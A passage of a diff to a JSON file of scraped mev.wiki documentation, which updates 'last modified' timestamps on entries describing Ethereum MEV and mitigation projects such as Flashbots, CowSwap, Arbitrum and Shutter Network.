node for miners, that not only watches the mempool like any other node, but also connects to a relayer (a server) operated by Flashbots. This MEV-Relay is a kind of parallel channel that directly connects miners to bots that want their transactions included. The transactions that the bots want to include are sent through the MEV-Relay as bundles containing: the transactions to execute a tip to the miner, coming as an ETH transfer These transactions use a 0 gwei gas price, as the payment to the miner is included in the transaction itself as the tip. Since these transactions are sent through a parallel private relay, it reduces the mempool bidding war, failed transactions bloating the blockchain, and overall gas cost for users. Links: GitHub: https://github.com/flashbots Research: https://github.com/flashbots/mev-research Monthly Meetings: https://github.com/flashbots/pm API: https://blocks.flashbots.net/ Discord: https://discord.gg/7hvTycdNcK Medium: https://medium.com/flashbots https://medium.com/flashbots/frontrunning-the-mev-crisis-40629a613752 https://medium.com/flashbots/quantifying-mev-introducing-mev-explore-v0-5ccbee0f6d02 https://ethresear.ch/t/flashbots-frontrunning-the-mev-crisis/8251 Previous BackRunMe by bloXroute Next mistX by alchemist Last modified 1yr ago", + "body": "Flashbots Flashbots Flashbots is a research and development organization formed to mitigate the negative externalities and existential risks posed by MEV. They aim to Democratize MEV Extraction through MEV-Geth, which enables a sealed-bid block space auction mechanism for communicating transaction order preference. ELI5 Link: https://twitter.com/_silto_/status/1381292907567722498 Flashbots created an ETH node for miners, that not only watches the mempool like any other node, but also connects to a relayer (a server) operated by Flashbots. This MEV-Relay is a kind of parallel channel that directly connects miners to bots that want their transactions included. The transactions that the bots want to include are sent through the MEV-Relay as bundles containing: the transactions to execute a tip to the miner, coming as an ETH transfer These transactions use a 0 gwei gas price, as the payment to the miner is included in the transaction itself as the tip. Since these transactions are sent through a parallel private relay, it reduces the mempool bidding war, failed transactions bloating the blockchain, and overall gas cost for users. Links: GitHub: https://github.com/flashbots Research: https://github.com/flashbots/mev-research Monthly Meetings: https://github.com/flashbots/pm API: https://blocks.flashbots.net/ Discord: https://discord.gg/7hvTycdNcK Medium: https://medium.com/flashbots https://medium.com/flashbots/frontrunning-the-mev-crisis-40629a613752 https://medium.com/flashbots/quantifying-mev-introducing-mev-explore-v0-5ccbee0f6d02 https://ethresear.ch/t/flashbots-frontrunning-the-mev-crisis/8251 Previous BackRunMe by bloXroute Next mistX by alchemist Last modified 2yr ago", "labels": [ "Documentation" ] @@ -698,7 +698,7 @@ { "title": "KeeperDAO", "html_url": "https://www.mev.wiki/solutions/faas-or-meva/keeperdao", - "body": "KeeperDAO KeeperDAO KeeperDAO is similar to a mining pool for Keepers. By incentivizing a game theory optimal strategy for cooperation among on-chain arbitrageurs, KeeperDAO provides an efficient mechanism for large scale arbitrage and liquidation trades on all DeFi protocols. The Hiding Game One of the 3 games that has been built. The Hiding Game refers to the cooperation between users and keepers to hide MEV by wrapping trades/debt in specialised on-chain contracts. These contracts restrict profit extracting opportunities to KeeperDAO itself. Here's the ELI5 Users route their trades and loans through KeeperDAO, which attempts to extract any arbitrage or liquidation profit available. Those profits are returned back to the user in $ROOK tokens, and profits go into a pool controlled by $ROOK holders. By giving KeeperDAO priority access to arbitrage and liquidations, the Hiding Game maximizes the profits available from these opportunities. kCompound (Phase 2 of the Hiding Game) kCompound is the second phase of the Hiding Game. KeeperDAO posts collateral to save your position from being publicly liquidated. Instead, you get privately liquidated. KeeperDAO keeper will then find the best price for your collateral, targeting a 5% profit margin. This profit will then be split between you, the keeper, and the KeeperDAO treasury, meaning that kCompound borrowers will receive a portion of the profits from their own liquidation. Links: Website: https://keeperdao.com/#/ Wiki: https://github.com/keeperdao/docs/wiki kCompound: https://medium.com/keeperdao/introducing-kcompound-a23511c847a0 Previous mistX by alchemist Next EDEN Network (ArcherSwap) Last modified 1yr ago", + "body": "KeeperDAO KeeperDAO KeeperDAO is similar to a mining pool for Keepers. By incentivizing a game theory optimal strategy for cooperation among on-chain arbitrageurs, KeeperDAO provides an efficient mechanism for large scale arbitrage and liquidation trades on all DeFi protocols. The Hiding Game One of the 3 games that has been built. The Hiding Game refers to the cooperation between users and keepers to hide MEV by wrapping trades/debt in specialised on-chain contracts. These contracts restrict profit extracting opportunities to KeeperDAO itself. Here's the ELI5 Users route their trades and loans through KeeperDAO, which attempts to extract any arbitrage or liquidation profit available. Those profits are returned back to the user in $ROOK tokens, and profits go into a pool controlled by $ROOK holders. By giving KeeperDAO priority access to arbitrage and liquidations, the Hiding Game maximizes the profits available from these opportunities. kCompound (Phase 2 of the Hiding Game) kCompound is the second phase of the Hiding Game. KeeperDAO posts collateral to save your position from being publicly liquidated. Instead, you get privately liquidated. KeeperDAO keeper will then find the best price for your collateral, targeting a 5% profit margin. This profit will then be split between you, the keeper, and the KeeperDAO treasury, meaning that kCompound borrowers will receive a portion of the profits from their own liquidation. Links: Website: https://keeperdao.com/#/ Wiki: https://github.com/keeperdao/docs/wiki kCompound: https://medium.com/keeperdao/introducing-kcompound-a23511c847a0 Previous mistX by alchemist Next EDEN Network (ArcherSwap) Last modified 2yr ago", "labels": [ "Documentation" ] @@ -706,7 +706,7 @@ { "title": "MiningDAO", "html_url": "https://www.mev.wiki/solutions/faas-or-meva/miningdao", - "body": "MiningDAO MiningDAO MiningDAO is building a decentralized and transparent protocol for block formation that aims to pass 100% of MEV to miners. Anyone with an Ethereum address can propose the next block to be mined (via a block sealhash), and attach a bounty for successfully mining it. The mining pools would then mine on the highest-bounty proposal. One is for searchers to submit Flashbots-compatible bundles. The other is the Archer Relay Network (powers Archerswap) where users can submit private transactions and be protected from malicious MEV. Links: Website: https://miningdao.io Medium: https://medium.com/mining-dao/introducing-miningdao-1e469626f7ad Previous Optimism Next BackBone Cabal Last modified 1yr ago", + "body": "MiningDAO MiningDAO MiningDAO is building a decentralized and transparent protocol for block formation that aims to pass 100% of MEV to miners. Anyone with an Ethereum address can propose the next block to be mined (via a block sealhash), and attach a bounty for successfully mining it. The mining pools would then mine on the highest-bounty proposal. One is for searchers to submit Flashbots-compatible bundles. The other is the Archer Relay Network (powers Archerswap) where users can submit private transactions and be protected from malicious MEV. Links: Website: https://miningdao.io Medium: https://medium.com/mining-dao/introducing-miningdao-1e469626f7ad Previous Optimism Next BackBone Cabal Last modified 2yr ago", "labels": [ "Documentation" ] @@ -714,7 +714,7 @@ { "title": "mistX by alchemist", "html_url": "https://www.mev.wiki/solutions/faas-or-meva/mistx-by-alchemist", - "body": "mistX by alchemist MistX by alchemist mistX is a DEX that enables end users to send transactions through Flashbots bundles. All transactions are gasless. However, instead of paying gas to the miners mistX users pay miners a bribe/tip in ETH. The tip is either included in the trade or comes from the user's wallet. The exchange utilises Flashbots and as such transactions processed via mistX do not publish user transaction information to a public mempool, but instead bundle transactions together. This hides the information from front-runners and thus prevents transactions from being manipulated, front-run, or sandwiched. Link: https://app.mistx.io/#/exchange Previous Flashbots Next KeeperDAO Last modified 1yr ago", + "body": "mistX by alchemist MistX by alchemist mistX is a DEX that enables end users to send transactions through Flashbots bundles. All transactions are gasless. However, instead of paying gas to the miners mistX users pay miners a bribe/tip in ETH. The tip is either included in the trade or comes from the user's wallet. The exchange utilises Flashbots and as such transactions processed via mistX do not publish user transaction information to a public mempool, but instead bundle transactions together. This hides the information from front-runners and thus prevents transactions from being manipulated, front-run, or sandwiched. Link: https://app.mistx.io/#/exchange Previous Flashbots Next KeeperDAO Last modified 2yr ago", "labels": [ "Documentation" ] @@ -722,7 +722,7 @@ { "title": "Optimism", "html_url": "https://www.mev.wiki/solutions/faas-or-meva/optimism", - "body": "Optimism Optimism Optimism are the original proposers of MEVA. MEV Auction (MEVA) is created in which the winner of the auction has the right to reorder submitted transactions and insert their own, as long as they do not delay any specific transaction by more than N blocks. MEVA on Ethereum Implementing the Auction The auction is able to extract MEV from miners by separating two functions 1) Transaction inclusion; and 2) transaction ordering. In order to implement MEVA roles are defined. Block producers determine transaction inclusion, and Sequencers determine transaction ordering. Block producers - Transaction Inclusion Block proposers are most analogous to traditional blockchain miners. Instead of proposing blocks with an ordering, they simply propose a set of transactions to eventually be included before N blocks. Sequencers - Transaction Ordering Sequencers are elected by a smart contract managed auction run by the block producers called the MEVA contract. This auction assigns the right to sequence the last N transactions. If, within a timeout the sequencer has not submitted an ordering which is included by block proposers, a new sequencer is elected. Implementation on Layer 2 It is possible to enshrine this MEVA contract directly on layer 1 (L1) blockchain consensus protocols. However, it is also possible to non-invasively add this mechanism in layer 2 (L2) and use it to manage Optimistic Rollup transactio ordering. In L2, L1 miners are repurposed and utilized as block proposers. MEVA contract is implemented and designated a single sequencer at a time. Links: https://optimism.io/ https://ethresear.ch/t/mev-auction-auctioning-transaction-ordering-rights-as-a-solution-to-miner-extractable-value/6788 https://docs.google.com/presentation/d/1RaF1byflrLF3yUjd-5vXDZB1ZIRofVeK3JYVD6NPr30/edit#slide=id.gc9bdacc472_0_96 Previous EDEN Network (ArcherSwap) Next MiningDAO Last modified 1yr ago", + "body": "Optimism Optimism Optimism are the original proposers of MEVA. MEV Auction (MEVA) is created in which the winner of the auction has the right to reorder submitted transactions and insert their own, as long as they do not delay any specific transaction by more than N blocks. MEVA on Ethereum Implementing the Auction The auction is able to extract MEV from miners by separating two functions 1) Transaction inclusion; and 2) transaction ordering. In order to implement MEVA roles are defined. Block producers determine transaction inclusion, and Sequencers determine transaction ordering. Block producers - Transaction Inclusion Block proposers are most analogous to traditional blockchain miners. Instead of proposing blocks with an ordering, they simply propose a set of transactions to eventually be included before N blocks. Sequencers - Transaction Ordering Sequencers are elected by a smart contract managed auction run by the block producers called the MEVA contract. This auction assigns the right to sequence the last N transactions. If, within a timeout the sequencer has not submitted an ordering which is included by block proposers, a new sequencer is elected. Implementation on Layer 2 It is possible to enshrine this MEVA contract directly on layer 1 (L1) blockchain consensus protocols. However, it is also possible to non-invasively add this mechanism in layer 2 (L2) and use it to manage Optimistic Rollup transactio ordering. In L2, L1 miners are repurposed and utilized as block proposers. MEVA contract is implemented and designated a single sequencer at a time. Links: https://optimism.io/ https://ethresear.ch/t/mev-auction-auctioning-transaction-ordering-rights-as-a-solution-to-miner-extractable-value/6788 https://docs.google.com/presentation/d/1RaF1byflrLF3yUjd-5vXDZB1ZIRofVeK3JYVD6NPr30/edit#slide=id.gc9bdacc472_0_96 Previous EDEN Network (ArcherSwap) Next MiningDAO Last modified 2yr ago", "labels": [ "Documentation" ] @@ -730,7 +730,7 @@ { "title": "Private Transactions", "html_url": "https://www.mev.wiki/solutions/faas-or-meva/private-transactions", - "body": "Private Transactions Private Transactions Typically, transactions are broadcast to the mempool where they remain pending until miners pick them and add to the block. Private transactions however, are only visible to the pool and are not broadcast to other nodes (pay more for faster transactions). Examples include 1inch Exchange's Stealth Transactions , Taichi Network and BloXroute . Taichi Network allows users to send private transactions directly to Sparkpool, bypassing the public mempool. Private Transactions offered by Taichi Network bloXroute Labs has a wide range of offerings and their core competency is low global latency for DeFi (8% of blocks mined within 1 sec). For the other side of the coin, here is bloXroute Labs' take on why private mempools are not necessarily bad : 1. Front-runners don't need these services to outpace regular users, who are slower by seconds. They need it to outpace one another, where improving speed 0.8->0.15 sec matters. 2. When a transaction is privately sent to pools other frontrunners can't attempt to front-run it. This helps avoid fierce escalation of fees. Link: https://docs.bloxroute.com/apis/frontrunning-protection Previous Front-running as a Service (FaaS) or MEV Auctions (MEVA) Next BackRunMe by bloXroute Last modified 1yr ago", + "body": "Private Transactions Private Transactions Typically, transactions are broadcast to the mempool where they remain pending until miners pick them and add to the block. Private transactions however, are only visible to the pool and are not broadcast to other nodes (pay more for faster transactions). Examples include 1inch Exchange's Stealth Transactions , Taichi Network and BloXroute . Taichi Network allows users to send private transactions directly to Sparkpool, bypassing the public mempool. Private Transactions offered by Taichi Network bloXroute Labs has a wide range of offerings and their core competency is low global latency for DeFi (8% of blocks mined within 1 sec). For the other side of the coin, here is bloXroute Labs' take on why private mempools are not necessarily bad : 1. Front-runners don't need these services to outpace regular users, who are slower by seconds. They need it to outpace one another, where improving speed 0.8->0.15 sec matters. 2. When a transaction is privately sent to pools other frontrunners can't attempt to front-run it. This helps avoid fierce escalation of fees. Link: https://docs.bloxroute.com/apis/frontrunning-protection Previous Front-running as a Service (FaaS) or MEV Auctions (MEVA) Next BackRunMe by bloXroute Last modified 2yr ago", "labels": [ "Documentation" ] @@ -738,7 +738,7 @@ { "title": "Arbitrum (Offchain Labs)", "html_url": "https://www.mev.wiki/solutions/mev-minimization/arbitrum-offchain-labs", - "body": "Arbitrum (Offchain Labs) Arbitrum by Offchain Labs Arbitrum is against MEVA and FaaS. 3 Modes of Arbitrum: 1. Single Sequencer: L2 MEV-Potential ( Mainnet Beta ) For Arbitrums initial, flagship Mainnet beta release, the Sequencer will be controlled by a single entity. This entity has transaction ordering rights within the narrow / 15 minute window; users are trusting the Sequencer not to frontrun them. 2. Distributed Sequencer With Fair Ordering: L2-MEV-minimized ( Mainnet Final Form ) The Arbitrum flagship chain will eventually have a distributed set of independent parties controlling the Sequencer. They will collectively propose state updates via the first BFT algorithm that enforces fair ordering within consensus (Aequitas) . Here, L2 MEV is only possible if >1/3 of the sequencing-parties maliciously collude, hence MEV-minimized. 3. No Sequencer: No L2 MEV A chain can be created in which no permissioned entities have Sequencing rights. Ordering is determined entirely by the Inbox contract; lose the ability to get lower latency than L1, but gain is that no party involved in L2, including Arbitrum validators, has any say in transaction ordering, and thus no L2 MEV enters the picture. Links: Website: https://offchainlabs.com/ Medium: https://medium.com/offchainlabs/front-running-as-a-service-334c929c945 Document: https://docs.google.com/document/d/1VOACGgTR84XWm5lH5Bki2nBcImi3lVRe2tYxf5F6XbA/edit Previous Fair sequencing service (Chainlink) Next Vega protocol Last modified 1yr ago", + "body": "Arbitrum (Offchain Labs) Arbitrum by Offchain Labs Arbitrum is against MEVA and FaaS. 3 Modes of Arbitrum: 1. Single Sequencer: L2 MEV-Potential ( Mainnet Beta ) For Arbitrums initial, flagship Mainnet beta release, the Sequencer will be controlled by a single entity. This entity has transaction ordering rights within the narrow / 15 minute window; users are trusting the Sequencer not to frontrun them. 2. Distributed Sequencer With Fair Ordering: L2-MEV-minimized ( Mainnet Final Form ) The Arbitrum flagship chain will eventually have a distributed set of independent parties controlling the Sequencer. They will collectively propose state updates via the first BFT algorithm that enforces fair ordering within consensus (Aequitas) . Here, L2 MEV is only possible if >1/3 of the sequencing-parties maliciously collude, hence MEV-minimized. 3. No Sequencer: No L2 MEV A chain can be created in which no permissioned entities have Sequencing rights. Ordering is determined entirely by the Inbox contract; lose the ability to get lower latency than L1, but gain is that no party involved in L2, including Arbitrum validators, has any say in transaction ordering, and thus no L2 MEV enters the picture. Links: Website: https://offchainlabs.com/ Medium: https://medium.com/offchainlabs/front-running-as-a-service-334c929c945 Document: https://docs.google.com/document/d/1VOACGgTR84XWm5lH5Bki2nBcImi3lVRe2tYxf5F6XbA/edit Previous Fair sequencing service (Chainlink) Next Vega protocol Last modified 2yr ago", "labels": [ "Documentation" ] @@ -746,7 +746,7 @@ { "title": "Conveyor (Automata Network)", "html_url": "https://www.mev.wiki/solutions/mev-minimization/conveyor-automata-network", - "body": "Conveyor (Automata Network) Conveyor - The Automata Network approach to tackling MEV At Automata, we have created Conveyor , a service that ingests and outputs transactions in a determined order. This creates a front-running-free zone that removes the chaos of transaction reordering. When transactions are fed into Conveyor, it determines the order of the incoming transactions and makes it impossible for block producers to perform the following: 1. Inject new transactions into the Conveyor output: The inserted transactions bypassing Conveyor is detectable by anyone because of signature mismatch. 2. Delete ordered transactions: Transactions accepted by Conveyor are broadcasted everywhere so transactions cannot be deleted unless ALL block producers are colluding and censoring the transactions at the same time. From the DEXs perspective, they can choose to accept either 1. Ordered transactions from Automatas Conveyor which is free from transaction reordering and other front-running transactions 2. Other unordered transactions (which include front-running etc) that may negatively impact their users Why should users trust Conveyor? Automatas Conveyor runs on a decentralized compute plane backed by many Geode instances. Each Geode instance can be attested so anyone can publicly verify that the Geode is running on a system with genuine hardware (i.e., CPU) and that the Geode application code matches the version that is open-sourced and audited. This provides a strong guarantee that: The Geode code is untampered with The Geode data is inaccessible to even Geode providers (In which case they cannot act on said data to front-run transactions) Importantly, Automatas Conveyor is a chain-agnostic solution to the MEV issue, and works seamlessly on various platforms zero modifications needed. An industry-first: Oblivious RAM In fully public computation, access pattern leakage is not negligible as everything is exposed. But in privacy-preserving computation, any tiny bit of information leakage becomes a significant issue. Studies have shown that access pattern leakage leads to exposure of sensitive information such as private keys from searchable encryption and trusted computing. This is where the Oblivious RAM algorithm comes into play. Automatas implementation is the first-of-its-kind in the blockchain industry, providing an exceedingly high degree of privacy in dApps. This greatly reduces the probability of user privacy being leaked even as access patterns are being monitored and analyzed by malicious actors. The Automata team has authored multiple research papers on state-of-the-art ORAM and hardware technologies to enhance the privacy and performance of existing networks. Robust P2P Primitives Using SGX Enclaves RAID 2020 PRO-ORAM: Practical Read-Only Oblivious RAM RAID 2019 OblivP2P: An Oblivious Peer-to-Peer Content Sharing System USENIX Security 2016 Preventing Page Faults from Telling Your Secrets Asia CCS 2016 Official Links Website: https://ata.network/ Whitepaper: https://xata.to/lightpaper GitHub: https://xata.to/github Documentation: https://docs.ata.network/ Ambassador program form: https://xata.to/ambassadors FAQ: https://xata.to/faq Official Socials Telegram Annoucement Channel: https://t.me/ata_announcement Telegram Chat Group: https://xata.to/telegram Twitter: https://xata.to/twitter Discord: https://xata.to/discord Medium: https://xata.to/medium Community Links Korea (Telegram): https://t.me/atanetworkkorea Spain (Telegram): https://t.me/atanetworkspanish Sri Lanka (Telegram): https://t.me/atanetworksinhala Russian (Telegram): https://t.me/atanetworkrussia Malay-Indonesian (Telegram): https://t.me/atanetworkmalaysia Other useful links MEV Checkup Tool: https://mev.tax/ Coinmarketcap article: https://xata.to/vxa Binance research report: https://xata.to/br Binance launchpool annoucement: https://xata.to/186e34 Previous MEV Minimization Next SecretSwap (Secret Network) Last modified 1yr ago", + "body": "Conveyor (Automata Network) Conveyor - The Automata Network approach to tackling MEV At Automata, we have created Conveyor , a service that ingests and outputs transactions in a determined order. This creates a front-running-free zone that removes the chaos of transaction reordering. When transactions are fed into Conveyor, it determines the order of the incoming transactions and makes it impossible for block producers to perform the following: 1. Inject new transactions into the Conveyor output: The inserted transactions bypassing Conveyor is detectable by anyone because of signature mismatch. 2. Delete ordered transactions: Transactions accepted by Conveyor are broadcasted everywhere so transactions cannot be deleted unless ALL block producers are colluding and censoring the transactions at the same time. From the DEXs perspective, they can choose to accept either 1. Ordered transactions from Automatas Conveyor which is free from transaction reordering and other front-running transactions 2. Other unordered transactions (which include front-running etc) that may negatively impact their users Why should users trust Conveyor? Automatas Conveyor runs on a decentralized compute plane backed by many Geode instances. Each Geode instance can be attested so anyone can publicly verify that the Geode is running on a system with genuine hardware (i.e., CPU) and that the Geode application code matches the version that is open-sourced and audited. This provides a strong guarantee that: The Geode code is untampered with The Geode data is inaccessible to even Geode providers (In which case they cannot act on said data to front-run transactions) Importantly, Automatas Conveyor is a chain-agnostic solution to the MEV issue, and works seamlessly on various platforms zero modifications needed. An industry-first: Oblivious RAM In fully public computation, access pattern leakage is not negligible as everything is exposed. But in privacy-preserving computation, any tiny bit of information leakage becomes a significant issue. Studies have shown that access pattern leakage leads to exposure of sensitive information such as private keys from searchable encryption and trusted computing. This is where the Oblivious RAM algorithm comes into play. Automatas implementation is the first-of-its-kind in the blockchain industry, providing an exceedingly high degree of privacy in dApps. This greatly reduces the probability of user privacy being leaked even as access patterns are being monitored and analyzed by malicious actors. The Automata team has authored multiple research papers on state-of-the-art ORAM and hardware technologies to enhance the privacy and performance of existing networks. Robust P2P Primitives Using SGX Enclaves RAID 2020 PRO-ORAM: Practical Read-Only Oblivious RAM RAID 2019 OblivP2P: An Oblivious Peer-to-Peer Content Sharing System USENIX Security 2016 Preventing Page Faults from Telling Your Secrets Asia CCS 2016 Official Links Website: https://ata.network/ Whitepaper: https://xata.to/lightpaper GitHub: https://xata.to/github Documentation: https://docs.ata.network/ Ambassador program form: https://xata.to/ambassadors FAQ: https://xata.to/faq Official Socials Telegram Annoucement Channel: https://t.me/ata_announcement Telegram Chat Group: https://xata.to/telegram Twitter: https://xata.to/twitter Discord: https://xata.to/discord Medium: https://xata.to/medium Community Links Korea (Telegram): https://t.me/atanetworkkorea Spain (Telegram): https://t.me/atanetworkspanish Sri Lanka (Telegram): https://t.me/atanetworksinhala Russian (Telegram): https://t.me/atanetworkrussia Malay-Indonesian (Telegram): https://t.me/atanetworkmalaysia Other useful links MEV Checkup Tool: https://mev.tax/ Coinmarketcap article: https://xata.to/vxa Binance research report: https://xata.to/br Binance launchpool annoucement: https://xata.to/186e34 Previous MEV Minimization Next SecretSwap (Secret Network) Last modified 2yr ago", "labels": [ "Documentation" ] @@ -754,7 +754,7 @@ { "title": "CowSwap", "html_url": "https://www.mev.wiki/solutions/mev-minimization/cowswap", - "body": "CowSwap CowSwap A collaboration between BalancerLabs and Gnosis, CowSwap is a DEX that leverages batch auctions to provide MEV protection, plus integrate with liquidity sources across DEXs to offer traders the best prices. When two traders each hold an asset the other wants, an order can be settled directly between them without an external market maker or liquidity provider. Any excess is settled in the same transaction with the best available AMM. The transaction is sent by professional solvers which set tight slippage bounds. Solvers compete with each other to achieve best prices for the user. Links: Website: https://cowswap.exchange/#/swap Blog: https://blog.gnosis.pm/introducing-gnosis-protocol-v2-and-balancer-gnosis-protocol-f693b2938ae4 Previous Vega protocol Next Veedo (StarkWare) Last modified 1yr ago", + "body": "CowSwap CowSwap A collaboration between BalancerLabs and Gnosis, CowSwap is a DEX that leverages batch auctions to provide MEV protection, plus integrate with liquidity sources across DEXs to offer traders the best prices. When two traders each hold an asset the other wants, an order can be settled directly between them without an external market maker or liquidity provider. Any excess is settled in the same transaction with the best available AMM. The transaction is sent by professional solvers which set tight slippage bounds. Solvers compete with each other to achieve best prices for the user. Links: Website: https://cowswap.exchange/#/swap Blog: https://blog.gnosis.pm/introducing-gnosis-protocol-v2-and-balancer-gnosis-protocol-f693b2938ae4 Previous Vega protocol Next Veedo (StarkWare) Last modified 2yr ago", "labels": [ "Documentation" ] @@ -762,7 +762,7 @@ { "title": "Fair sequencing service (Chainlink)", "html_url": "https://www.mev.wiki/solutions/mev-minimization/fair-sequencing-service-chainlink", - "body": "Fair sequencing service (Chainlink) The Fair Sequencing Service by ChainLink The idea behind FSS is to have an oracle network order the transactions sent to a particular contract SC, including both user transactions and oracle reports. Oracle nodes ingest transactions and then reach consensus on their ordering, rather than allowing a single leader to dictate it. FSS is a framework for implementing ordering policies, of which Aequitas (protocol for order-fairness in addition to consistency and liveness) is one example. It can alternatively support simpler approaches, such as straightforward encryption of transactions, which can then be decrypted in a threshold manner by oracle nodes after ordering. It will also support various policies for inserting oracle reports into a stream of transactions. (It can even support MEV auctions, if desired.) Links: Blog post: https://blog.chain.link/chainlink-fair-sequencing-services-enabling-a-provably-fair-defi-ecosystem/ Whitepaper (to be released later) Previous SecretSwap (Secret Network) Next Arbitrum (Offchain Labs) Last modified 1yr ago", + "body": "Fair sequencing service (Chainlink) The Fair Sequencing Service by ChainLink The idea behind FSS is to have an oracle network order the transactions sent to a particular contract SC, including both user transactions and oracle reports. Oracle nodes ingest transactions and then reach consensus on their ordering, rather than allowing a single leader to dictate it. FSS is a framework for implementing ordering policies, of which Aequitas (protocol for order-fairness in addition to consistency and liveness) is one example. It can alternatively support simpler approaches, such as straightforward encryption of transactions, which can then be decrypted in a threshold manner by oracle nodes after ordering. It will also support various policies for inserting oracle reports into a stream of transactions. (It can even support MEV auctions, if desired.) Links: Blog post: https://blog.chain.link/chainlink-fair-sequencing-services-enabling-a-provably-fair-defi-ecosystem/ Whitepaper (to be released later) Previous SecretSwap (Secret Network) Next Arbitrum (Offchain Labs) Last modified 2yr ago", "labels": [ "Documentation" ] @@ -770,7 +770,7 @@ { "title": "LibSubmarine", "html_url": "https://www.mev.wiki/solutions/mev-minimization/libsubmarine", - "body": "LibSubmarine LibSubmarine LibSubmarine is an open-source smart contract library that protects your contract against front-runners by temporarily hiding transactions on-chain. Links: Website: https://libsubmarine.org/ Video: https://www.youtube.com/watch?v=N8PDKoptmPs&feature=emb_imp_woyt&ab_channel=IC3InitiativeforCryptocurrenciesandContracts GitHub: https://github.com/lorenzb/libsubmarine Previous Veedo (StarkWare) Next Sikka Last modified 1yr ago", + "body": "LibSubmarine LibSubmarine LibSubmarine is an open-source smart contract library that protects your contract against front-runners by temporarily hiding transactions on-chain. Links: Website: https://libsubmarine.org/ Video: https://www.youtube.com/watch?v=N8PDKoptmPs&feature=emb_imp_woyt&ab_channel=IC3InitiativeforCryptocurrenciesandContracts GitHub: https://github.com/lorenzb/libsubmarine Previous Veedo (StarkWare) Next Sikka Last modified 2yr ago", "labels": [ "Documentation" ] @@ -778,7 +778,7 @@ { "title": "SecretSwap (Secret Network)", "html_url": "https://www.mev.wiki/solutions/mev-minimization/secretswap-secret-network", - "body": "SecretSwap (Secret Network) Secret Swap Secret Swap is an automated market maker (AMM) liquidity protocol. There is no orderbook, no centralized party, and no central facilitator of trade. Using Secret Contracts, the mempool of potential Secret Swap transactions are kept entirely encrypted - protecting users from MEV, front-running attacks and providing an increased level of privacy compared to traditional AMMs. The protocol uses swap secret contract based tokens (SNIP-20s) on Secret Network. Given the encrypted nature of SNIP-20s secret contracts, inputs to a transaction/contract are encrypted while they are on the mempool and cannot be front-run by any adversary. Users will have to pay for gas and 0.3% swap fees with the $SCRT token to use Secret Swap. Links: Website: https://www.secretswap.io Analytics: http://secretanalytics.xyz Documentation: https://docs.secretswap.io/secretswap Previous Conveyor (Automata Network) Next Fair sequencing service (Chainlink) Last modified 1yr ago", + "body": "SecretSwap (Secret Network) Secret Swap Secret Swap is an automated market maker (AMM) liquidity protocol. There is no orderbook, no centralized party, and no central facilitator of trade. Using Secret Contracts, the mempool of potential Secret Swap transactions are kept entirely encrypted - protecting users from MEV, front-running attacks and providing an increased level of privacy compared to traditional AMMs. The protocol uses swap secret contract based tokens (SNIP-20s) on Secret Network. Given the encrypted nature of SNIP-20s secret contracts, inputs to a transaction/contract are encrypted while they are on the mempool and cannot be front-run by any adversary. Users will have to pay for gas and 0.3% swap fees with the $SCRT token to use Secret Swap. Links: Website: https://www.secretswap.io Analytics: http://secretanalytics.xyz Documentation: https://docs.secretswap.io/secretswap Previous Conveyor (Automata Network) Next Fair sequencing service (Chainlink) Last modified 2yr ago", "labels": [ "Documentation" ] @@ -786,7 +786,7 @@ { "title": "Shutter Network", "html_url": "https://www.mev.wiki/solutions/mev-minimization/shutter-network", - "body": "Shutter Network Shutter Network Shutter Network is an open-source project that aims to prevent frontrunning and malicious MEV on Ethereum by using a threshold cryptography-based distributed key generation (DKG) protocol. A Shutter transaction is a transaction protected from frontrunning in the target smart contract system. It therefore passes through a sequence of stages before it is executed. A Shutter transaction flow: 1. Created and encrypted in the user's wallet; 2. Sent to the batcher contract as a standard Ethereum transaction; 3. Picked up and decrypted by the keypers; 4. Sent to the executor contract, and 5. Forwarded to the target contract. Links: Website: https://shutter.ghost.io/ GitHub: https://github.com/brainbot-com/shutter Previous Sikka Next Other solutions Last modified 1yr ago", + "body": "Shutter Network Shutter Network Shutter Network is an open-source project that aims to prevent frontrunning and malicious MEV on Ethereum by using a threshold cryptography-based distributed key generation (DKG) protocol. A Shutter transaction is a transaction protected from frontrunning in the target smart contract system. It therefore passes through a sequence of stages before it is executed. A Shutter transaction flow: 1. Created and encrypted in the user's wallet; 2. Sent to the batcher contract as a standard Ethereum transaction; 3. Picked up and decrypted by the keypers; 4. Sent to the executor contract, and 5. Forwarded to the target contract. Links: Website: https://shutter.ghost.io/ GitHub: https://github.com/brainbot-com/shutter Previous Sikka Next Other solutions Last modified 2yr ago", "labels": [ "Documentation" ] @@ -794,7 +794,7 @@ { "title": "Sikka", "html_url": "https://www.mev.wiki/solutions/mev-minimization/sikka", - "body": "Sikka Sikka Sikka's MEV solution to censorship and frontrunning problems is using a technique called Threshold Decryption, as a plugin to the Tendermint Core BFT consensus engine to create mempool level privacy. With this plugin, users are able to submit encrypted transactions to the blockchain, which are only decrypted and executed after being committed to a block by a quorum of 2/3 validators. Links: Website: https://sikka.tech/ Presentation: https://docs.google.com/presentation/d/1tQEUpZjy_U9J-VQAx1Wf5W9oOX5rrCY3AwjAb7ZgA68/edit#slide=id.p Previous LibSubmarine Next Shutter Network Last modified 1yr ago", + "body": "Sikka Sikka Sikka's MEV solution to censorship and frontrunning problems is using a technique called Threshold Decryption, as a plugin to the Tendermint Core BFT consensus engine to create mempool level privacy. With this plugin, users are able to submit encrypted transactions to the blockchain, which are only decrypted and executed after being committed to a block by a quorum of 2/3 validators. Links: Website: https://sikka.tech/ Presentation: https://docs.google.com/presentation/d/1tQEUpZjy_U9J-VQAx1Wf5W9oOX5rrCY3AwjAb7ZgA68/edit#slide=id.p Previous LibSubmarine Next Shutter Network Last modified 2yr ago", "labels": [ "Documentation" ] @@ -802,7 +802,7 @@ { "title": "Veedo (StarkWare)", "html_url": "https://www.mev.wiki/solutions/mev-minimization/veedo-starkware", - "body": "Veedo (StarkWare) Veedo by StarkWare VeeDo is StarkWares STARK-based Verifiable Delay Function (VDF), and its PoC is now live on Mainnet. VeeDo's time-locks allow information to be sealed for a predetermined period of time (during the sequencing phase), and then made public. 2 approaches using privacy to minimize MEV 1. Time-locks as part of the protocol layer 2. Time-locks on Ethereum with smart contracts - supported today Links: Website: https://starkware.co/ Medium: https://medium.com/starkware/presenting-veedo-e4bbff77c7ae Presentation: https://docs.google.com/presentation/d/1C_Rb_rtUXT2Nkettu_GPSlD9yCge8ioBNLRj5OBNbyY/edit#slide=id.gb576f94980_0_836 Previous CowSwap Next LibSubmarine Last modified 1yr ago", + "body": "Veedo (StarkWare) Veedo by StarkWare VeeDo is StarkWares STARK-based Verifiable Delay Function (VDF), and its PoC is now live on Mainnet. VeeDo's time-locks allow information to be sealed 